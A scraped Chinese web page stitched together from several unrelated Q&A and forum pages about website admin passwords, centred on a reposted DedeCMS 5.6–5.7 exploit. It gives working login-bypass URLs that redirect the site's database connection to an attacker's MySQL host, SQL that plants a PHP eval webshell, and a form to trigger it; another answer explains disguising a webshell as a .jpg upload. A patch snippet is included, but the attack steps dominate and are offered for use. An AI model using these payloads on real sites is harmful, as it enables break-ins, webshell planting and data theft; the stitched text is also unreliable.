网站的后台账户密码给别人了,会有什么后果呀

已解决问题
知道网站的后台账号密码但是不知道FTP账号密码
空间的密码要是知道还说什么啊
只是知道网站后台的账号和密码 那服务器在美国 都不知道是哪个公司的知道是哪个公司的 64.78.168.187 只有备份数据库的地方但是没有上传的地方啊
浏览次数:5107
用手机阿里扫一扫
最满意答案
该答案已经被保护
试试我的方法:上传一个webshell,里面有下载的功能,至于怎么上传webshell,可以找找后台里有没有上传的地方或者看看有没有备份数据的地方..&应该有的吧,你仔细看看,添加文章里,有个上传的地方,还有留言的地方,应该有个上传图片的地方的.没有上传,要添加图片怎么办?把你的马改后缀成jpg,上传,如果允许上传ASP后缀的话,就不用改JPG了上传了,再备份成ASP就行了...
答案创立者
以企业身份回答&
正在进行的活动
生意经不允许发广告,违者直接删除
复制问题或回答,一经发现,拉黑7天
快速解决你的电商难题
店铺优化排查提升2倍流量
擅长&nbsp 店铺优化
您可能有同感的问题
扫一扫用手机阿里看生意经
问题排行榜
当前问题的答案已经被保护,只有知县(三级)以上的用户可以编辑!写下您的建议,管理员会及时与您联络!
server is okDEDECMS 爆严重安全漏洞 免账号密码直接进入后台
互联网 & 08-20 23:46:44 & 作者:佚名 &
众所周知,因使用简单、客户群多,织梦CMS一直被爆出许多漏洞。今天小编在群里得到织梦官方论坛某版主可靠消息:DEDECMS爆严重安全漏洞,近期官方会发布相关补丁,望大家及时关注补丁动态。
入侵步骤如下:http://www.xx.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root 把上面validate后面的字母改为当前的验证码,即可直接进入网站后台。 小编分析了一下,此漏洞的前提是必须得到后台路径才能实现,因此大家一定要养成使用DEDECM建站时改后台名字的习惯。下面给出官方的解决办法: 解决办法: 找到include/common.inc.php文件,把 foreach($_REQUEST as $_k=&$_v) { var_dump($_k); if( strlen($_k)&0 && preg_match('#^(cfg_|GLOBALS)#',$_k) ): { exit('Request var not allow!'); } } 换成 //检查和注册外部提交的变量 function CheckRequest(&$val) { if (is_array($val)) { foreach ($val as $_k=&$_v) { CheckRequest($_k); CheckRequest($val[$_k]); } } else { if( strlen($val)&0 && preg_match('#^(cfg_|GLOBALS)#',$val) ) { exit('Request var not allow!'); } } } CheckRequest($_REQUEST); 网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell 前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen(&1.php&, \'a\');@fwrite($fp, \'\');echo &OK&;@fclose($fp);{/dede:php}'); 再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 &form action=&& method=&post& name=&QuickSearch& id=&QuickSearch& onsubmit=&addaction();&& &input type=&text& value=&http://localhost:8080/plus/mytag_js.php?aid=1& name=&doaction& style=&width:400&&&br /& &input type=&text& value=&dbhost& name=&_COOKIE[GLOBALS][cfg_dbhost]& style=&width:400&&&br /& &input type=&text& value=&dbuser& name=&_COOKIE[GLOBALS][cfg_dbuser]& style=&width:400&&&br /& &input type=&text& value=&dbpwd& name=&_COOKIE[GLOBALS][cfg_dbpwd]& style=&width:400&&&br /& &input type=&text& value=&dbname& name=&_COOKIE[GLOBALS][cfg_dbname]& style=&width:400&&&br /& &input type=&text& value=&dede_& name=&_COOKIE[GLOBALS][cfg_dbprefix]& style=&width:400&&&br /& &input type=&text& value=&true& name=&nocache& style=&width:400&& &input type=&submit& value=&提交& name=&QuickSearchBtn&&&br /& &/form& &script& function addaction() { document.QuickSearch.action=document.QuickSearch.doaction. } &/script& ==================================================== DedeCms v5.6-5.7 0day 其实除过windows系统,很多服务提供商是不让php连接外部mysql服务器的。 用PHPNow在本地搭建DEDECMS运行环境并安装DEDECMS,这里以DedeCMSV57_UTF8为例。 直接进后台: dede/login.php?dopost=login&validate=8235&userid=admin&pwd=admin&_POST[GLOBALS][cfg_dbhost]=192.168.1.1&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=123456&_POST[GLOBALS][cfg_dbname]=dedecmsv57utf8&_POST[GLOBALS][cfg_dbprefix]=dede_ 直接获得webshell: 进入自己在本地搭建的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen(&1.php&, \'a\');@fwrite($fp, \'&?php eval($_POST[c]) ?&\');echo &OK&;@fclose($fp);{/dede:php}'); 在地址栏提交以下语句即可获得一句话木马plus/1.php: plus/mytag_js.php?aid=1&_POST[GLOBALS][cfg_dbhost]=192.168.1.1&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=123456&_POST[GLOBALS][cfg_dbname]=dedecmsv57utf8&_POST[GLOBALS][cfg_dbprefix]=dede_&nocache=true
大家感兴趣的内容
12345678910
最近更新的内容在 SegmentFault,学习技能、解决问题
每个月,我们帮助 1000 万的开发者解决各种各样的技术问题。并助力他们在技术能力、职业生涯、影响力上获得提升。
问题对人有帮助,内容完整,我也想知道答案
问题没有实际价值,缺少关键内容,没有改进余地
现在要做一个后台管理系统,因为有些数据拿不到,需要用到别人的后台系统其中的一个功能页面,他告诉我了账号和密码,在我的系统中怎么设置,用户能实现不用登录就直接跳转进了页面,这样交互还能好一些,总不能让客户登录不同的账号密码两次吧,望大神解救。真的是没有办法中的办法了。
答案对人有帮助,有参考价值
答案没帮助,是错误的答案,答非所问
模拟登录,获取cookie,大体代码如下摘自()
HttpPost post = new HttpPost(urlLogin);
HttpResponse response = client.execute(post);
HttpEntity entity = response.getEntity();
CookieStore cookieStore = client.getCookieStore();
client.setCookieStore(cookieStore);
String html = client.execute(get);
根据获取到html,判断:
1). 如果没有任何跳转链接,把这个html直接用js拍到你们的页面上
$("#content").html(html);
2).如果有链接
需要替换所有链接的url,指向你自己系统的/gaoshiqing?url=xxx上gaoshiqing 负责重复 步骤1. 模拟登录,重新请求。
总得来说,如果对方有很多链接,你这边就很复杂了,看一下能不能去除一些无用的链接,直接改对方的HTML,从而达成目的
答案对人有帮助,有参考价值
答案没帮助,是错误的答案,答非所问
CURL,你来帮助用户模拟登陆
答案对人有帮助,有参考价值
答案没帮助,是错误的答案,答非所问
我没太看明白需求,你是想拿到这个用户在别人后台系统的数据到自己系统展示还是要直接iframe嵌入别人系统的页面到自己系统?如果仅仅是拿数据,你可以通过用户的帐号密码或者user唯一ID去请求接口获取,如果内嵌页面,最好有token机制之类的,不然crul是种植不了他方系统的cookie。
答案对人有帮助,有参考价值
答案没帮助,是错误的答案,答非所问
动态生成表单并且提交
答案对人有帮助,有参考价值
答案没帮助,是错误的答案,答非所问
登录状态需要登录凭证来维护, 通常为session
id, 而session 是存在cookie里的, 而cookie通常是有域名保护的
你们不是同一个域的, 所以基本上不可行, 可行的方法是, 对方提供一个redirect登录接口就可以,如请求: xxx.com/login?user=myuser&pwd=mypwd&redirect=http://登录后要跳转的页面(urlencode)
答案对人有帮助,有参考价值
答案没帮助,是错误的答案,答非所问
不知道你问的是不是SSO的内容?
答案对人有帮助,有参考价值
答案没帮助,是错误的答案,答非所问
ajax自动帮其登录不就行了
同步到新浪微博
分享到微博?
关闭理由:
删除理由:
忽略理由:
推广(招聘、广告、SEO 等)方面的内容
与已有问题重复(请编辑该提问指向已有相同问题)
答非所问,不符合答题要求
宜作评论而非答案
带有人身攻击、辱骂、仇恨等违反条款的内容
无法获得确切结果的问题
非开发直接相关的问题
非技术提问的讨论型问题
其他原因(请补充说明)
我要该,理由是:
在 SegmentFault,学习技能、解决问题
每个月,我们帮助 1000 万的开发者解决各种各样的技术问题。并助力他们在技术能力、职业生涯、影响力上获得提升。&>&网站后台帐号密码忘记了怎么办
网站后台帐号密码忘记了怎么办
上传大小:77KB
网站后台帐号密码忘记了怎么办
综合评分:0
下载个数:
{%username%}回复{%com_username%}{%time%}\
/*点击出现回复框*/
$(".respond_btn").on("click", function (e) {
$(this).parents(".rightLi").children(".respond_box").show();
e.stopPropagation();
$(".cancel_res").on("click", function (e) {
$(this).parents(".res_b").siblings(".res_area").val("");
$(this).parents(".respond_box").hide();
e.stopPropagation();
/*删除评论*/
$(".del_comment_c").on("click", function (e) {
var id = $(e.target).attr("id");
$.getJSON('/index.php/comment/do_invalid/' + id,
function (data) {
if (data.succ == 1) {
$(e.target).parents(".conLi").remove();
alert(data.msg);
$(".res_btn").click(function (e) {
var parentWrap = $(this).parents(".respond_box"),
q = parentWrap.find(".form1").serializeArray(),
resStr = $.trim(parentWrap.find(".res_area_r").val());
console.log(q);
//var res_area_r = $.trim($(".res_area_r").val());
if (resStr == '') {
$(".res_text").css({color: "red"});
$.post("/index.php/comment/do_comment_reply/", q,
function (data) {
if (data.succ == 1) {
var $target,
evt = e || window.
$target = $(evt.target || evt.srcElement);
var $dd = $target.parents('dd');
var $wrapReply = $dd.find('.respond_box');
console.log($wrapReply);
//var mess = $(".res_area_r").val();
var mess = resS
var str = str.replace(/{%header%}/g, data.header)
.replace(/{%href%}/g, 'http://' + window.location.host + '/user/' + data.username)
.replace(/{%username%}/g, data.username)
.replace(/{%com_username%}/g, data.com_username)
.replace(/{%time%}/g, data.time)
.replace(/{%id%}/g, data.id)
.replace(/{%mess%}/g, mess);
$dd.after(str);
$(".respond_box").hide();
$(".res_area_r").val("");
$(".res_area").val("");
$wrapReply.hide();
alert(data.msg);
}, "json");
/*删除回复*/
$(".rightLi").on("click", '.del_comment_r', function (e) {
var id = $(e.target).attr("id");
$.getJSON('/index.php/comment/do_comment_del/' + id,
function (data) {
if (data.succ == 1) {
$(e.target).parent().parent().parent().parent().parent().remove();
$(e.target).parents('.res_list').remove()
alert(data.msg);
//填充回复
function KeyP(v) {
var parentWrap = $(v).parents(".respond_box");
parentWrap.find(".res_area_r").val($.trim(parentWrap.find(".res_area").val()));
评论共有0条
lijinmin11
综合评分:
积分/C币:3
综合评分:
积分/C币:3
综合评分:
积分/C币:3
satisfation02
综合评分:
积分/C币:3
综合评分:
积分/C币:5
综合评分:
积分/C币:3
综合评分:
积分/C币:12
小鸟闯江湖
综合评分:
积分/C币:3
综合评分:
积分/C币:0
VIP会员动态
CSDN下载频道资源及相关规则调整公告V11.10
下载频道用户反馈专区
下载频道积分规则调整V1710.18
spring mvc+mybatis+mysql+maven+bootstrap 整合实现增删查改简单实例.zip
资源所需积分/C币
当前拥有积分
当前拥有C币
输入下载码
为了良好体验,不建议使用迅雷下载
网站后台帐号密码忘记了怎么办
会员到期时间:
剩余下载个数:
剩余积分:0
为了良好体验,不建议使用迅雷下载
积分不足!
资源所需积分/C币
当前拥有积分
您可以选择
程序员的必选
绿色安全资源
资源所需积分/C币
当前拥有积分
当前拥有C币
为了良好体验,不建议使用迅雷下载
资源所需积分/C币
当前拥有积分
当前拥有C币
为了良好体验,不建议使用迅雷下载
资源所需积分/C币
当前拥有积分
当前拥有C币
您的积分不足,将扣除 10 C币
为了良好体验,不建议使用迅雷下载
无法举报自己的资源
你当前的下载分为234。
你还不是VIP会员
开通VIP会员权限,免积分下载
你下载资源过于频繁,请输入验证码
您因违反CSDN下载频道规则而被锁定帐户,如有疑问,请联络:!
若举报审核通过,可返还被扣除的积分
被举报人:
举报的资源分:
请选择类型
资源无法下载 ( 404页面、下载失败、资源本身问题)
资源无法使用 (文件损坏、内容缺失、题文不符)
侵犯版权资源 (侵犯公司或个人版权)
虚假资源 (恶意欺诈、刷分资源)
含色情、危害国家安全内容
含广告、木马病毒资源
*详细原因:
网站后台帐号密码忘记了怎么办网站源码下载下来了怎么找后台账号密码【渗透吧】_百度贴吧
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&签到排名:今日本吧第个签到,本吧因你更精彩,明天继续来努力!
本吧签到人数:0成为超级会员,使用一键签到本月漏签0次!成为超级会员,赠送8张补签卡连续签到:天&&累计签到:天超级会员单次开通12个月以上,赠送连续签到卡3张
关注:47,158贴子:
网站源码下载下来了怎么找后台账号密码收藏
阿里云云盾先知渗透测试新用户特惠,一次渗透测试,仅需6000元.立刻报名!
如果是织梦会有备份文件,打开备份admin表就看见密码了,解密就OK
源码搞下来,又没有搞数据,,,
不一定有后台
登录百度帐号}

我要回帖

更多关于 密码网站 的文章

更多推荐

版权声明:文章内容来源于网络,版权归原作者所有,如有侵权请点击这里与我们联系,我们将及时删除。

点击添加站长微信